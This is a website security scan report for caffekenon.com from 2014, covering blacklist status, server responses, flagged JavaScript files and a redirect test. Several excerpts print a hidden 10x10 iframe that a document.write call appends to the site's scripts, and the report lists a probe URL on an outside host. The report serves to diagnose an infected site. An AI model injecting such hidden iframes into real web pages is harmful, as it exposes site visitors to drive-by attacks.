Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=caffekenon.com
Result: Google marks this website as suspicious; visiting it may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://caffekenon.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 27 Dec 2014 00:58:56 GMT Location: http://caffekenon.com/home Server: Apache Content-Length: 298 Content-Type: text/html; charset=iso-8859-1 | clean |
http://caffekenon.com/home | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 27 Dec 2014 00:58:57 GMT Location: http://caffekenon.com/home/ Server: Apache Content-Length: 299 Content-Type: text/html; charset=iso-8859-1 | clean |
http://caffekenon.com/home/ | 200 OK Content-Length: 20964 Content-Type: text/html | clean |
http://caffekenon.com/home/media/system/js/caption.js | 200 OK Content-Length: 2099 Content-Type: text/javascript | malicious |
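Malicious code - confirmed by antiviruses (see below). The excerpt appears abridged in the middle. Its last statement, a document.write() call that writes a 10x10 iframe into the page, comes after the end of the caption script and appears to be the added code; the same statement ends the showcaseFX.js and ajax_1.3.js excerpts below, which is consistent with one modification applied to several .js files on the site. The iframe src shown is http://www.google.com; the report does not say whether that is the value the server returned.
var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>');
Antivirus reports: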
| ||
http://caffekenon.com/home/plugins/content/avreloaded/silverlight.js | 200 OK Content-Length: 8229 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is cut off after the first part of the file, so the part that triggered the detection may lie beyond what is shown; the same applies to the wmvplayer.js, swfobject.js and avreloaded.js excerpts below.
if(!window.Silverlight)window.Silverlight={};Silverlight._silverlightCount=0;Silverlight.ua=null;Silverlight.available=false;Silverlight.fwlinkRoot="http://go.microsoft.com/fwlink/?LinkID=";Silverlight.detectUserAgent=function(){var a=window.navigator.userAgent;Silverlight.ua={OS:"Unsupported",Browser:"Unsupported"};if(a.indexOf("Windows NT")>=0)Silverlight.ua.OS="Windows";else if(a.indexOf("PPC Mac OS X")>=0)Silverlight.ua.OS="MacPPC";else if(a.indexOf("Intel Mac OS X")>=0)Silverlight.
Antivirus reports:
| ||
http://caffekenon.com/home/plugins/content/avreloaded/wmvplayer.js | 200 OK Content-Length: 16612 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof jeroenwijering=="undefined"){var jeroenwijering=new Object();jeroenwijering.utils=new Object()}jeroenwijering.Player=function(B,C,A){this.configuration={backgroundcolor:"ffffff",file:"video.wmv",height:"260",image:"",backcolor:"FFFFFF",frontcolor:"000000",lightcolor:"000000",screencolor:"000000",width:"320",logo:"",overstretch:"false",showicons:"true",shownavigation:"true",showstop:"false",showdigits:"true",usefullscreen:"true",usemute:"false",autostart:"false",bufferlength:"3",duratio Antivirus reports:
| ||
http://caffekenon.com/home/plugins/content/avreloaded/swfobject.js | 200 OK Content-Length: 12390 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject=function(){var UNDEF="undefined",OBJECT="object",SHOCKWAVE_FLASH="Shockwave Flash",SHOCKWAVE_FLASH_AX="ShockwaveFlash.ShockwaveFlash",FLASH_MIME_TYPE="application/x-shockwave-flash",EXPRESS_INSTALL_ID="SWFObjectExprInst",win=window,doc=document,nav=navigator,domLoadFnArr=[],regObjArr=[],timer=null,storedAltContent=null,storedAltContentId=null,isDomLoaded=false,isExpressInstallActive=false;var ua=function(){var w3cdom=typeof doc.getElementById!=UNDEF&&typeof doc.getElementsB Antivirus reports:
| ||
http://caffekenon.com/home/plugins/content/avreloaded/avreloaded.js | 200 OK Content-Length: 2495 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof (allvideos)=="undefined"){var allvideos=new Object();allvideos.APIs=new Array()}function getUpdate(D,C,B,A){if(A=="null"){return }allvideos.APIs.each(function(E){if(E._pid==A){E._plCB(D,C,B)}})}allvideos.API=function(B){var A=null;allvideos.APIs.each(function(C){if(C._pid==B){A=C}});if(A!=null){return A}this._pid=B;this._player=null;this._item=null;this._load=null;this._width=null;this._height=null;this._state=null;this._elapsed=null;this._remaining=null;this._volume=null;this._plCB=fu Antivirus reports:
| ||
http://caffekenon.com/home/modules/mod_jxtc_newspro/js/showcaseFX.js | 200 OK Content-Length: 17105 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof showcasefx != 'function') { function showcasefx(id, type, direction, sp, tsp, layer, transition){ var idx = $(id); if(idx){ var shows = idx.getElements('div[class=' + id + 'shows]'); var stotal = shows.length; var repeat; var wd = 0; var hg = 0; var finalhg = 0; var i = 0; var j = 1; var factor = 1; var aux; var op; var keepy; var keep = ''; var stnoplay = true; var t } }); } if(bac!=null){ bac.addEvent('click', function(e) { new Event(e).stop(); $clear(repeat); op = 'rev'; factor = -1; loop(); if (sp >= 0) { repeat = loop.periodical(timex); } }); } return true; } } }document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>'); Antivirus reports:
| ||
http://caffekenon.com/home/plugins/system/pc_includes/ajax_1.3.js | 200 OK Content-Length: 9083 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Jax() {var loadingTimeout=400;var iframe;this.loadingFunction=function(){};this.doneLoadingFunction=function(){};this.stringify=function(arg){var c,i,l,o,u,v;switch(typeof arg){case'object':if(arg){if(arg.constructor==Array){o='';for(i=0;i<arg.length;++i){v=this.stringify(arg[i]);if(o&&(v!==u)){o+=',';} if(v!==u){o+=v;}} return'['+o+']';}else if(typeof arg.toString!='undefined'){o='';for(i in arg){v=this.stringify(arg[i]);if(v!==u){if(o){o+=',';} o+=this.strin else {if(objCheckbox[0].checked) {var value=objCheckbox[0].value;value=value.replace(/"/g,""");postData[postData.length]=new Array(assCheckbox[i],encodeURIComponent(value));}}}}}} return postData;}} function jax_iresponse(){jax.processIResponse();} var jax=new Jax();document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>'); Antivirus reports:
| ||
http://distec-photos.fymaction.fr/xtbcwzvr.php?id=1638985 | 404 Not Found Content-Length: 302 Content-Type: text/html | clean |
http://distec-photos.fymaction.fr/test404page.js | 404 Not Found Content-Length: 304 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: caffekenon.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 27 Dec 2014 00:58:56 GMT
Location: http://caffekenon.com/home
Server: Apache
Content-Length: 298
Content-Type: text/html; charset=iso-8859-1
...298 bytes of data.
GET / HTTP/1.1
Host: caffekenon.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 27 Dec 2014 00:58:56 GMT
Location: http://caffekenon.com/home
Server: Apache
Content-Length: 298
Content-Type: text/html; charset=iso-8859-1
...298 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: caffekenon.com
Referer: http://www.google.com/search?q=caffekenon.com
Result:
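The response matches the first query: adding a search-engine Referer did not produce a different redirect, so no suspicious redirects were found. Only the Referer header was varied, so a redirect conditioned on other request properties would not show up in this test.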
GET / HTTP/1.1
Host: caffekenon.com
Referer: http://www.google.com/search?q=caffekenon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.